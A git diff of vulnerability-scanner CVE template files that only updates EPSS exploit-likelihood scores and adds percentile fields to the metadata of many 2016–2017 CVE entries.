a/http/cves/2016/CVE-2016-3978.yaml +++ b/http/cves/2016/CVE-2016-3978.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-79 epss-score: 0.00217 cpe: cpe:2.3:o:fortinet:fortios:5.0.0:*:*:*:*:*:*:* + epss-percentile: 0.59005 metadata: max-request: 1 vendor: fortinet diff --git a/http/cves/2016/CVE-2016-4437.yaml b/http/cves/2016/CVE-2016-4437.yaml index 23ff51f926..b518b0de45 100644 --- a/http/cves/2016/CVE-2016-4437.yaml +++ b/http/cves/2016/CVE-2016-4437.yaml @@ -17,8 +17,9 @@ info: cvss-score: 8.1 cve-id: CVE-2016-4437 cwe-id: CWE-284 - epss-score: 0.97483 + epss-score: 0.97507 cpe: cpe:2.3:a:apache:shiro:*:*:*:*:*:*:*:* + epss-percentile: 0.99967 metadata: max-request: 1 vendor: apache diff --git a/http/cves/2016/CVE-2016-4975.yaml b/http/cves/2016/CVE-2016-4975.yaml index 0df3c0c46a..f2063b4297 100644 --- a/http/cves/2016/CVE-2016-4975.yaml +++ b/http/cves/2016/CVE-2016-4975.yaml @@ -17,8 +17,9 @@ info: cvss-score: 6.1 cve-id: CVE-2016-4975 cwe-id: CWE-93 - epss-score: 0.00366 + epss-score: 0.00428 cpe: cpe:2.3:a:apache:http_server:2.2.0:*:*:*:*:*:*:* + epss-percentile: 0.71207 metadata: max-request: 1 vendor: apache diff --git a/http/cves/2016/CVE-2016-4977.yaml b/http/cves/2016/CVE-2016-4977.yaml index b62d9b6141..c6a25ac2d4 100644 --- a/http/cves/2016/CVE-2016-4977.yaml +++ b/http/cves/2016/CVE-2016-4977.yaml @@ -19,6 +19,7 @@ info: cwe-id: CWE-19 epss-score: 0.03345 cpe: cpe:2.3:a:pivotal:spring_security_oauth:1.0.0:*:*:*:*:*:*:* + epss-percentile: 0.9012 metadata: max-request: 1 vendor: pivotal diff --git a/http/cves/2016/CVE-2016-5649.yaml b/http/cves/2016/CVE-2016-5649.yaml index fb3eb43ba9..3c1ed6d7a6 100644 --- a/http/cves/2016/CVE-2016-5649.yaml +++ b/http/cves/2016/CVE-2016-5649.yaml @@ -14,8 +14,9 @@ info: cvss-score: 9.8 cve-id: CVE-2016-5649 cwe-id: CWE-200,CWE-319 - epss-score: 0.10584 + epss-score: 0.15681 cpe: cpe:2.3:o:netgear:dgn2200_firmware:1.0.0.50_7.0.50:*:*:*:*:*:*:* + epss-percentile: 0.95209 metadata: max-request: 1 vendor: netgear diff --git a/http/cves/2016/CVE-2016-6195.yaml b/http/cves/2016/CVE-2016-6195.yaml index bedd2a5e56..cc72ea4844 100644 --- a/http/cves/2016/CVE-2016-6195.yaml +++ b/http/cves/2016/CVE-2016-6195.yaml @@ -19,6 +19,7 @@ info: cwe-id: CWE-89 epss-score: 0.00284 cpe: cpe:2.3:a:vbulletin:vbulletin:*:patch_level_4:*:*:*:*:*:* + epss-percentile: 0.64634 metadata: max-request: 6 shodan-query: title:"Powered By vBulletin" diff --git a/http/cves/2016/CVE-2016-6277.yaml b/http/cves/2016/CVE-2016-6277.yaml index 47de0f0ac0..8a1e5608df 100644 --- a/http/cves/2016/CVE-2016-6277.yaml +++ b/http/cves/2016/CVE-2016-6277.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-352 epss-score: 0.97471 cpe: cpe:2.3:o:netgear:d6220_firmware:*:*:*:*:*:*:*:* + epss-percentile: 0.99942 metadata: max-request: 1 vendor: netgear diff --git a/http/cves/2016/CVE-2016-6601.yaml b/http/cves/2016/CVE-2016-6601.yaml index cfce9fa1bf..e5a09e48ae 100644 --- a/http/cves/2016/CVE-2016-6601.yaml +++ b/http/cves/2016/CVE-2016-6601.yaml @@ -16,8 +16,9 @@ info: cvss-score: 7.5 cve-id: CVE-2016-6601 cwe-id: CWE-22 - epss-score: 0.97521 + epss-score: 0.97518 cpe: cpe:2.3:a:zohocorp:webnms_framework:5.2:*:*:*:*:*:*:* + epss-percentile: 0.99974 metadata: max-request: 1 vendor: zohocorp diff --git a/http/cves/2016/CVE-2016-7552.yaml b/http/cves/2016/CVE-2016-7552.yaml index db2bc880c1..7fbb6197e7 100644 --- a/http/cves/2016/CVE-2016-7552.yaml +++ b/http/cves/2016/CVE-2016-7552.yaml @@ -14,8 +14,9 @@ info: cvss-score: 9.8 cve-id: CVE-2016-7552 cwe-id: CWE-22 - epss-score: 0.97039 + epss-score: 0.97004 cpe: cpe:2.3:a:trendmicro:threat_discovery_appliance:2.6.1062:r1:*:*:*:*:*:* + epss-percentile: 0.99624 metadata: max-request: 1 vendor: trendmicro diff --git a/http/cves/2016/CVE-2016-7834.yaml b/http/cves/2016/CVE-2016-7834.yaml index 41a91c1448..f1dcd93ffc 100644 --- a/http/cves/2016/CVE-2016-7834.yaml +++ b/http/cves/2016/CVE-2016-7834.yaml @@ -21,6 +21,7 @@ info: cwe-id: CWE-200 epss-score: 0.00202 cpe: cpe:2.3:o:sony:snc_series_firmware:*:*:*:*:*:*:*:* + epss-percentile: 0.57452 metadata: max-request: 1 vendor: sony diff --git a/http/cves/2016/CVE-2016-7981.yaml b/http/cves/2016/CVE-2016-7981.yaml index f57462717a..c4d77f5496 100644 --- a/http/cves/2016/CVE-2016-7981.yaml +++ b/http/cves/2016/CVE-2016-7981.yaml @@ -19,6 +19,7 @@ info: cwe-id: CWE-79 epss-score: 0.00258 cpe: cpe:2.3:a:spip:spip:*:*:*:*:*:*:*:* + epss-percentile: 0.62782 metadata: max-request: 1 vendor: spip diff --git a/http/cves/2016/CVE-2016-8527.yaml b/http/cves/2016/CVE-2016-8527.yaml index 0e493c6378..a803999456 100644 --- a/http/cves/2016/CVE-2016-8527.yaml +++ b/http/cves/2016/CVE-2016-8527.yaml @@ -15,8 +15,9 @@ info: cvss-score: 6.1 cve-id: CVE-2016-8527 cwe-id: CWE-79 - epss-score: 0.00249 + epss-score: 0.00221 cpe: cpe:2.3:a:hp:airwave:*:*:*:*:*:*:*:* + epss-percentile: 0.59489 metadata: max-request: 1 vendor: hp diff --git a/http/cves/2017/CVE-2017-0929.yaml b/http/cves/2017/CVE-2017-0929.yaml index dac4e960bc..fabf126a62 100644 --- a/http/cves/2017/CVE-2017-0929.yaml +++ b/http/cves/2017/CVE-2017-0929.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-918 epss-score: 0.03588 cpe: cpe:2.3:a:dnnsoftware:dotnetnuke:*:*:*:*:*:*:*:* + epss-percentile: 0.90434 metadata: max-request: 1 vendor: dnnsoftware diff --git a/http/cves/2017/CVE-2017-1000028.yaml b/http/cves/2017/CVE-2017-1000028.yaml index 4d94a25c8a..ee5c804854 100644 --- a/http/cves/2017/CVE-2017-1000028.yaml +++ b/http/cves/2017/CVE-2017-1000028.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-22 epss-score: 0.97522 cpe: cpe:2.3:a:oracle:glassfish_server:4.1:*:*:*:open_source:*:*:* + epss-percentile: 0.99977 metadata: max-request: 2 vendor: oracle diff --git a/http/cves/2017/CVE-2017-1000029.yaml b/http/cves/2017/CVE-2017-1000029.yaml index 1bbc8eeac8..a84d31f478 100644 --- a/http/cves/2017/CVE-2017-1000029.yaml +++ b/http/cves/2017/CVE-2017-1000029.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-200 epss-score: 0.00387 cpe: cpe:2.3:a:oracle:glassfish_server:3.0.1:*:*:*:open_source:*:*:* + epss-percentile: 0.69803 metadata: max-request: 1 vendor: oracle diff --git a/http/cves/2017/CVE-2017-1000163.yaml b/http/cves/2017/CVE-2017-1000163.yaml index 721faefdf7..5de1c7163c 100644 --- a/http/cves/2017/CVE-2017-1000163.yaml +++ b/http/cves/2017/CVE-2017-1000163.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-601 epss-score: 0.00151 cpe: cpe:2.3:a:phoenixframework:phoenix:1.0.0:*:*:*:*:*:*:* + epss-percentile: 0.50609 metadata: max-request: 1 vendor: phoenixframework diff --git a/http/cves/2017/CVE-2017-1000170.yaml b/http/cves/2017/CVE-2017-1000170.yaml index 31817b86cf..4f47489d9d 100644 --- a/http/cves/2017/CVE-2017-1000170.yaml +++ b/http/cves/2017/CVE-2017-1000170.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-22 epss-score: 0.73129 cpe: cpe:2.3:a:jqueryfiletree_project:jqueryfiletree:*:*:*:*:*:*:*:* + epss-percentile: 0.97669 metadata: max-request: 1 vendor: jqueryfiletree_project diff --git a/http/cves/2017/CVE-2017-1000486.yaml b/http/cves/2017/CVE-2017-1000486.yaml index 11918414a4..1ec9995271 100644 --- a/http/cves/2017/CVE-2017-1000486.yaml +++ b/http/cves/2017/CVE-2017-1000486.yaml @@ -16,8 +16,9 @@ info: cvss-score: 9.8 cve-id: CVE-2017-1000486 cwe-id: CWE-326 - epss-score: 0.97108 + epss-score: 0.96992 cpe: cpe:2.3:a:primetek:primefaces:*:*:*:*:*:*:*:* + epss-percentile: 0.99619 metadata: max-request: 1 vendor: primetek diff --git a/http/cves/2017/CVE-2017-10075.yaml b/http/cves/2017/CVE-2017-10075.yaml index aca96fe8e0..80d7feb4fc 100644 --- a/http/cves/2017/CVE-2017-10075.yaml +++ b/http/cves/2017/CVE-2017-10075.yaml @@ -17,6 +17,7 @@ info: cve-id: CVE-2017-10075 epss-score: 0.00409 cpe: cpe:2.3:a:oracle:webcenter_content:11.1.1.9.0:*:*:*:*:*:*:* + epss-percentile: 0.70564 metadata: max-request: 2 google-query: inurl:"/cs/idcplg" diff --git a/http/cves/2017/CVE-2017-10271.yaml b/http/cves/2017/CVE-2017-10271.yaml index e60db1cf4b..32e30ca263 100644 --- a/http/cves/2017/CVE-2017-10271.yaml +++ b/http/cves/2017/CVE-2017-10271.yaml @@ -16,8 +16,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H cvss-score: 7.5 cve-id: CVE-2017-10271 - epss-score: 0.97429 + epss-score: 0.97438 cpe: cpe:2.3:a:oracle:weblogic_server:10.3.6.0.0:*:*:*:*:*:*:* + epss-percentile: 0.99911 metadata: max-request: 2 vendor: oracle diff --git a/http/cves/2017/CVE-2017-10974.yaml b/http/cves/2017/CVE-2017-10974.yaml index f1358975ae..bd4e862694 100644 --- a/http/cves/2017/CVE-2017-10974.yaml +++ b/http/cves/2017/CVE-2017-10974.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-22 epss-score: 0.96161 cpe: cpe:2.3:a:yaws:yaws:1.91:*:*:*:*:*:*:* + epss-percentile: 0.99289 metadata: max-request: 1 vendor: yaws diff --git a/http/cves/2017/CVE-2017-11165.yaml b/http/cves/2017/CVE-2017-11165.yaml index d193fc2ed7..d54dce4a90 100644 --- a/http/cves/2017/CVE-2017-11165.yaml +++ b/http/cves/2017/CVE-2017-11165.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-200 epss-score: 0.94336 cpe: cpe:2.3:o:datataker:dt80_dex_firmware:1.50.012:*:*:*:*:*:*:* + epss-percentile: 0.98871 metadata: max-request: 1 shodan-query: http.title:"datataker" diff --git a/http/cves/2017/CVE-2017-11444.yaml b/http/cves/2017/CVE-2017-11444.yaml index 03a027bd8b..a40a1c4a34 100644 --- a/http/cves/2017/CVE-2017-11444.yaml +++ b/http/cves/2017/CVE-2017-11444.yaml @@ -14,8 +14,9 @@ info: cvss-score: 9.8 cve-id: CVE-2017-11444 cwe-id: CWE-89 - epss-score: 0.02273 + epss-score: 0.04447 cpe: cpe:2.3:a:intelliants:subrion_cms:*:*:*:*:*:*:*:* + epss-percentile: 0.91351 metadata: max-request: 1 vendor: intelliants diff --git a/http/cves/2017/CVE-2017-11512.yaml b/http/cves/2017/CVE-2017-11512.yaml index fd04c59aba..c62296efa7 100644 --- a/http/cves/2017/CVE-2017-11512.yaml +++ b/http/cves/2017/CVE-2017-11512.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-22 epss-score: 0.97175 cpe: cpe:2.3:a:manageengine:servicedesk:9.3.9328:*:*:*:*:*:*:* + epss-percentile: 0.99714 metadata: max-request: 2 shodan-query: http.title:"ManageEngine" diff --git a/http/cves/2017/CVE-2017-11586.yaml b/http/cves/2017/CVE-2017-11586.yaml index a5e595575b..34c1c3ddc8 100644 --- a/http/cves/2017/CVE-2017-11586.yaml +++ b/http/cves/2017/CVE-2017-11586.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-601 epss-score: 0.00121 cpe: cpe:2.3:a:finecms:finecms:*:*:*:*:*:*:*:* + epss-percentile: 0.45569 metadata: max-request: 2 verified: true diff --git a/http/cves/2017/CVE-2017-11610.yaml b/http/cves/2017/CVE-2017-11610.yaml index afa81df33e..1cbaf2861e 100644 --- a/http/cves/2017/CVE-2017-11610.yaml +++ b/http/cves/2017/CVE-2017-11610.yaml @@ -16,8 +16,9 @@ info: cvss-score: 8.8 cve-id: CVE-2017-11610 cwe-id: CWE-276 - epss-score: 0.9743 + epss-score: 0.97461 cpe: cpe:2.3:a:supervisord:supervisor:*:*:*:*:*:*:*:* + epss-percentile: 0.99932 metadata: max-request: 1 shodan-query: http.title:"Supervisor Status" diff --git a/http/cves/2017/CVE-2017-11629.yaml b/http/cves/2017/CVE-2017-11629.yaml index 6bf1a2767b..dc2ecf951d 100644 --- a/http/cves/2017/CVE-2017-11629.yaml +++ b/http/cves/2017/CVE-2017-11629.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-79 epss-score: 0.001 cpe: cpe:2.3:a:finecms:finecms:*:*:*:*:*:*:*:* + epss-percentile: 0.40499 metadata: max-request: 1 verified: true diff --git a/http/cves/2017/CVE-2017-12138.yaml b/http/cves/2017/CVE-2017-12138.yaml index 6c830de612..1ea9ed9161 100644 --- a/http/cves/2017/CVE-2017-12138.yaml +++ b/http/cves/2017/CVE-2017-12138.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-601 epss-score: 0.00062 cpe: cpe:2.3:a:xoops:xoops:2.5.8:*:*:*:*:*:*:* + epss-percentile: 0.24266 metadata: max-request: 2 vendor: xoops diff --git a/http/cves/2017/CVE-2017-12149.yaml b/http/cves/2017/CVE-2017-12149.yaml index f596d3c4d6..db499ced39 100644 --- a/http/cves/2017/CVE-2017-12149.yaml +++ b/http/cves/2017/CVE-2017-12149.yaml @@ -16,8 +16,9 @@ info: cvss-score: 9.8 cve-id: CVE-2017-12149 cwe-id: CWE-502 - epss-score: 0.974 + epss-score: 0.97292 cpe: cpe:2.3:a:redhat:jboss_enterprise_application_platform:5.0.0:*:*:*:*:*:*:* + epss-percentile: 0.9979 metadata: max-request: 3 vendor: redhat diff --git a/http/cves/2017/CVE-2017-12542.yaml b/http/cves/2017/CVE-2017-12542.yaml index a8d35a8eaf..365e607162 100644 --- a/http/cves/2017/CVE-2017-12542.yaml +++ b/http/cves/2017/CVE-2017-12542.yaml @@ -15,8 +15,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 10 cve-id: CVE-2017-12542 - epss-score: 0.97258 + epss-score: 0.97361 cpe: cpe:2.3:o:hp:integrated_lights-out_4_firmware:*:*:*:*:*:*:*:* + epss-percentile: 0.99841 metadata: max-request: 1 vendor: hp diff --git a/http/cves/2017/CVE-2017-12544.yaml b/http/cves/2017/CVE-2017-12544.yaml index af2714d605..6684f86c9d 100644 --- a/http/cves/2017/CVE-2017-12544.yaml +++ b/http/cves/2017/CVE-2017-12544.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-79 epss-score: 0.96723 cpe: cpe:2.3:a:hp:system_management_homepage:*:*:*:*:*:*:*:* + epss-percentile: 0.99503 metadata: max-request: 1 vendor: hp diff --git a/http/cves/2017/CVE-2017-12583.yaml b/http/cves/2017/CVE-2017-12583.yaml index 93d59c2d8e..5bd2f1f47b 100644 --- a/http/cves/2017/CVE-2017-12583.yaml +++ b/http/cves/2017/CVE-2017-12583.yaml @@ -15,6 +15,7 @@ info: cwe-id: CWE-79 epss-score: 0.001 cpe: cpe:2.3:a:dokuwiki:dokuwiki:*:*:*:*:*:*:*:* + epss-percentile: 0.40499 metadata: max-request: 1 shodan-query: http.title:"DokuWiki" diff --git a/http/cves/2017/CVE-2017-12611.yaml b/http/cves/2017/CVE-2017-12611.yaml index 5e33980f7f..51841f9e8a 100644 --- a/http/cves/2017/CVE-2017-12611.yaml +++ b/http/cves/2017/CVE-2017-12611.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-20 epss-score: 0.97358 cpe: cpe:2.3:a:apache:struts:2.0.1:*:*:*:*:*:*:* + epss-percentile: 0.99841 metadata: max-request: 1 vendor: apache diff --git a/http/cves/2017/CVE-2017-12615.yaml b/http/cves/2017/CVE-2017-12615.yaml index 2f8a28f47a..9252b0d4a8 100644 --- a/http/cves/2017/CVE-2017-12615.yaml +++ b/http/cves/2017/CVE-2017-12615.yaml @@ -19,6 +19,7 @@ info: cwe-id: CWE-434 epss-score: 0.97499 cpe: cpe:2.3:a:apache:tomcat:7.0:*:*:*:*:*:*:* + epss-percentile: 0.99962 metadata: max-request: 2 shodan-query: title:"Apache Tomcat" diff --git a/http/cves/2017/CVE-2017-12617.yaml b/http/cves/2017/CVE-2017-12617.yaml index 15bba35a88..0460c90e4f 100644 --- a/http/cves/2017/CVE-2017-12617.yaml +++ b/http/cves/2017/CVE-2017-12617.yaml @@ -17,8 +17,9 @@ info: cvss-score: 8.1 cve-id: "CVE-2017-12617" cwe-id: CWE-434 - epss-score: 0.97541 + epss-score: 0.97542 cpe: cpe:2.3:a:apache:tomcat:7.0.0:*:*:*:*:*:*:* + epss-percentile: 0.9999 metadata: verified: "true" max-request: 2 diff --git a/http/cves/2017/CVE-2017-12629.yaml b/http/cves/2017/CVE-2017-12629.yaml index d3145ab7a8..4041581147 100644 --- a/http/cves/2017/CVE-2017-12629.yaml +++ b/http/cves/2017/CVE-2017-12629.yaml @@ -16,8 +16,9 @@ info: cvss-score: 9.8 cve-id: CVE-2017-12629 cwe-id: CWE-611 - epss-score: 0.97491 + epss-score: 0.97452 cpe: cpe:2.3:a:apache:solr:*:*:*:*:*:*:*:* + epss-percentile: 0.99923 metadata: max-request: 2 vendor: apache diff --git a/http/cves/2017/CVE-2017-12635.yaml b/http/cves/2017/CVE-2017-12635.yaml index 86bd636b7b..bda6a918aa 100644 --- a/http/cves/2017/CVE-2017-12635.yaml +++ b/http/cves/2017/CVE-2017-12635.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-269 epss-score: 0.97536 cpe: cpe:2.3:a:apache:couchdb:*:*:*:*:*:*:*:* + epss-percentile: 0.99988 metadata: max-request: 1 vendor: apache diff --git a/http/cves/2017/CVE-2017-12637.yaml b/http/cves/2017/CVE-2017-12637.yaml index dfe34e0048..f23e84563f 100644 --- a/http/cves/2017/CVE-2017-12637.yaml +++ b/http/cves/2017/CVE-2017-12637.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-22 epss-score: 0.00648 cpe: cpe:2.3:a:sap:netweaver_application_server_java:7.50:*:*:*:*:*:*:* + epss-percentile: 0.76701 metadata: max-request: 1 shodan-query: http.favicon.hash:-266008933 diff --git a/http/cves/2017/CVE-2017-12794.yaml b/http/cves/2017/CVE-2017-12794.yaml index e543208310..964e23d790 100644 --- a/http/cves/2017/CVE-2017-12794.yaml +++ b/http/cves/2017/CVE-2017-12794.yaml @@ -19,6 +19,7 @@ info: cwe-id: CWE-79 epss-score: 0.00219 cpe: cpe:2.3:a:djangoproject:django:1.10.0:*:*:*:*:*:*:* + epss-percentile: 0.59163 metadata: max-request: 1 vendor: djangoproject diff --git a/http/cves/2017/CVE-2017-14135.yaml b/http/cves/2017/CVE-2017-14135.yaml index 4934a266ec..ac40357f96 100644 --- a/http/cves/2017/CVE-2017-14135.yaml +++ b/http/cves/2017/CVE-2017-14135.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-78 epss-score: 0.96679 cpe: cpe:2.3:a:dreambox:opendreambox:2.0:*:*:*:*:*:*:* + epss-percentile: 0.99486 metadata: max-request: 1 shodan-query: title:"Dreambox WebControl" diff --git a/http/cves/2017/CVE-2017-14186.yaml b/http/cves/2017/CVE-2017-14186.yaml index b9d8e3ff74..f005c90402 100644 --- a/http/cves/2017/CVE-2017-14186.yaml +++ b/http/cves/2017/CVE-2017-14186.yaml @@ -19,6 +19,7 @@ info: cwe-id: CWE-79 epss-score: 0.02948 cpe: cpe:2.3:o:fortinet:fortios:*:*:*:*:*:*:*:* + epss-percentile: 0.89542 metadata: max-request: 1 shodan-query: port:10443 http.favicon.hash:945408572 diff --git a/http/cves/2017/CVE-2017-14524.yaml b/http/cves/2017/CVE-2017-14524.yaml index 5c3543cffa..bcf9d8d5ca 100644 --- a/http/cves/2017/CVE-2017-14524.yaml +++ b/http/cves/2017/CVE-2017-14524.yaml @@ -16,8 +16,9 @@ info: cvss-score: 6.1 cve-id: CVE-2017-14524 cwe-id: CWE-601 - epss-score: 0.00329 + epss-score: 0.00258 cpe: cpe:2.3:a:opentext:documentum_administrator:7.2.0180.0055:*:*:*:*:*:*:* + epss-percentile: 0.62785 metadata: max-request: 1 vendor: opentext diff --git a/http/cves/2017/CVE-2017-14535.yaml b/http/cves/2017/CVE-2017-14535.yaml index 3407bba7c6..ad229d6661 100644 --- a/http/cves/2017/CVE-2017-14535.yaml +++ b/http/cves/2017/CVE-2017-14535.yaml @@ -16,8 +16,9 @@ info: cvss-score: 8.8 cve-id: CVE-2017-14535 cwe-id: CWE-78 - epss-score: 0.06176 + epss-score: 0.04456 cpe: cpe:2.3:a:netfortris:trixbox:2.8.0.4:*:*:*:*:*:*:* + epss-percentile: 0.91357 metadata: max-request: 1 vendor: netfortris diff --git a/http/cves/2017/CVE-2017-14537.yaml b/http/cves/2017/CVE-2017-14537.yaml index c29c76fac5..aefc911a52 100644 --- a/http/cves/2017/CVE-2017-14537.yaml +++ b/http/cves/2017/CVE-2017-14537.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-22 epss-score: 0.01002 cpe: cpe:2.3:a:netfortris:trixbox:2.8.0.4:*:*:*:*:*:*:* + epss-percentile: 0.81748 metadata: max-request: 2 vendor: netfortris diff --git a/http/cves/2017/CVE-2017-14622.yaml b/http/cves/2017/CVE-2017-14622.yaml index bd35884585..a49ccd3551 100644 --- a/http/cves/2017/CVE-2017-14622.yaml +++ b/http/cves/2017/CVE-2017-14622.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-79 epss-score: 0.00135 cpe: cpe:2.3:a:2kblater:2kb_amazon_affiliates_store:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.47979 metadata: max-request: 2 verified: true diff --git a/http/cves/2017/CVE-2017-14651.yaml b/http/cves/2017/CVE-2017-14651.yaml index c72ce37e1e..bbdf00d454 100644 --- a/http/cves/2017/CVE-2017-14651.yaml +++ b/http/cves/2017/CVE-2017-14651.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-79 epss-score: 0.00144 cpe: cpe:2.3:a:wso2:api_manager:2.1.0:*:*:*:*:*:*:* + epss-percentile: 0.49573 metadata: max-request: 1 vendor: wso2 diff --git a/http/cves/2017/CVE-2017-14849.yaml b/http/cves/2017/CVE-2017-14849.yaml index abe5cdef83..f7e453536c 100644 --- a/http/cves/2017/CVE-2017-14849.yaml +++ b/http/cves/2017/CVE-2017-14849.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-22 epss-score: 0.96872 cpe: cpe:2.3:a:nodejs:node.js:8.5.0:*:*:*:*:*:*:* + epss-percentile: 0.9957 metadata: max-request: 1 vendor: nodejs diff --git a/http/cves/2017/CVE-2017-15287.yaml b/http/cves/2017/CVE-2017-15287.yaml index 8b73a01a3f..8245e76127 100644 --- a/http/cves/2017/CVE-2017-15287.yaml +++ b/http/cves/2017/CVE-2017-15287.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-79 epss-score: 0.00129 cpe: cpe:2.3:a:bouqueteditor_project:bouqueteditor:2.0.0:*:*:*:*:dreambox:*:* + epss-percentile: 0.46905 metadata: max-request: 1 framework: dreambox diff --git a/http/cves/2017/CVE-2017-15363.yaml b/http/cves/2017/CVE-2017-15363.yaml index 0e97599956..1033033a9d 100644 --- a/http/cves/2017/CVE-2017-15363.yaml +++ b/http/cves/2017/CVE-2017-15363.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-22 epss-score: 0.04393 cpe: cpe:2.3:a:luracast:restler:*:*:*:*:*:typo3:*:* + epss-percentile: 0.91303 metadata: max-request: 1 framework: typo3 diff --git a/http/cves/2017/CVE-2017-15647.yaml b/http/cves/2017/CVE-2017-15647.yaml index 5246f9d70c..f1aa56b49b 100644 --- a/http/cves/2017/CVE-2017-15647.yaml +++ b/http/cves/2017/CVE-2017-15647.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-22 epss-score: 0.02013 cpe: cpe:2.3:o:fiberhome:routerfiberhome_firmware:*:*:*:*:*:*:*:* + epss-percentile: 0.87436 metadata: max-request: 1 vendor: fiberhome diff --git a/http/cves/2017/CVE-2017-15715.yaml b/http/cves/2017/CVE-2017-15715.yaml index 02b57dcb07..fe64daa1a0 100644 --- a/http/cves/2017/CVE-2017-15715.yaml +++ b/http/cves/2017/CVE-2017-15715.yaml @@ -16,8 +16,9 @@ info: cvss-score: 8.1 cve-id: CVE-2017-15715 cwe-id: CWE-20 - epss-score: 0.971 + epss-score: 0.97053 cpe: cpe:2.3:a:apache:http_server:*:*:*:*:*:*:*:* + epss-percentile: 0.99649 metadata: max-request: 2 vendor: apache diff --git a/http/cves/2017/CVE-2017-15944.yaml b/http/cves/2017/CVE-2017-15944.yaml index f4fa257ff1..4fec82c069 100644 --- a/http/cves/2017/CVE-2017-15944.yaml +++ b/http/cves/2017/CVE-2017-15944.yaml @@ -15,8 +15,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2017-15944 - epss-score: 0.97414 + epss-score: 0.97425 cpe: cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:* + epss-percentile: 0.99895 metadata: max-request: 1 vendor: paloaltonetworks diff --git a/http/cves/2017/CVE-2017-16806.yaml b/http/cves/2017/CVE-2017-16806.yaml index f63a1280fc..3e8ce9ae33 100644 --- a/http/cves/2017/CVE-2017-16806.yaml +++ b/http/cves/2017/CVE-2017-16806.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-22 epss-score: 0.07055 cpe: cpe:2.3:a:ulterius:ulterius_server:1.5.6.0:*:*:*:*:*:*:* + epss-percentile: 0.93105 metadata: max-request: 2 vendor: ulterius diff --git a/http/cves/2017/CVE-2017-16877.yaml b/http/cves/2017/CVE-2017-16877.yaml index 7b76625c78..22ba3c00a5 100644 --- a/http/cves/2017/CVE-2017-16877.yaml +++ b/http/cves/2017/CVE-2017-16877.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-22 epss-score: 0.0032 cpe: cpe:2.3:a:zeit:next.js:*:*:*:*:*:*:*:* + epss-percentile: 0.66762 metadata: max-request: 1 vendor: zeit diff --git a/http/cves/2017/CVE-2017-16894.yaml b/http/cves/2017/CVE-2017-16894.yaml index 06b374c404..c74d570fad 100644 --- a/http/cves/2017/CVE-2017-16894.yaml +++ b/http/cves/2017/CVE-2017-16894.yaml @@ -19,6 +19,7 @@ info: cwe-id: CWE-200 epss-score: 0.29151 cpe: cpe:2.3:a:laravel:laravel:*:*:*:*:*:*:*:* + epss-percentile: 0.9629 metadata: max-request: 1 fofa-query: app="Laravel-Framework" diff --git a/http/cves/2017/CVE-2017-17043.yaml b/http/cves/2017/CVE-2017-17043.yaml index 02ebc3cbb6..07c810f05a 100644 --- a/http/cves/2017/CVE-2017-17043.yaml +++ b/http/cves/2017/CVE-2017-17043.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-79 epss-score: 0.00245 cpe: cpe:2.3:a:zitec:emag_marketplace_connector:1.0.0:*:*:*:*:wordpress:*:* + epss-percentile: 0.6175 metadata: max-request: 1 framework: wordpress diff --git a/http/cves/2017/CVE-2017-17059.yaml b/http/cves/2017/CVE-2017-17059.yaml index b8e4acc91f..c16eeb27d7 100644 --- a/http/cves/2017/CVE-2017-17059.yaml +++ b/http/cves/2017/CVE-2017-17059.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-79 epss-score: 0.00263 cpe: cpe:2.3:a:amtythumb_project:amtythumb:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.63188 metadata: max-request: 1 framework: wordpress diff --git a/http/cves/2017/CVE-2017-17451.yaml b/http/cves/2017/CVE-2017-17451.yaml index 057d68e0cf..2f8b58dff2 100644 --- a/http/cves/2017/CVE-2017-17451.yaml +++ b/http/cves/2017/CVE-2017-17451.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-79 epss-score: 0.00178 cpe: cpe:2.3:a:wpmailster:wp_mailster:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.54328 metadata: max-request: 1 framework: wordpress diff --git a/http/cves/2017/CVE-2017-17562.yaml b/http/cves/2017/CVE-2017-17562.yaml index 4c3bd723a2..7434002dcc 100644 --- a/http/cves/2017/CVE-2017-17562.yaml +++ b/http/cves/2017/CVE-2017-17562.yaml @@ -19,6 +19,7 @@ info: cwe-id: CWE-20 epss-score: 0.9747 cpe: cpe:2.3:a:embedthis:goahead:*:*:*:*:*:*:*:* + epss-percentile: 0.99941 metadata: max-request: 65 vendor: embedthis diff --git a/http/cves/2017/CVE-2017-17731.yaml b/http/cves/2017/CVE-2017-17731.yaml index 7b9bd698ed..c20bef64a3 100644 --- 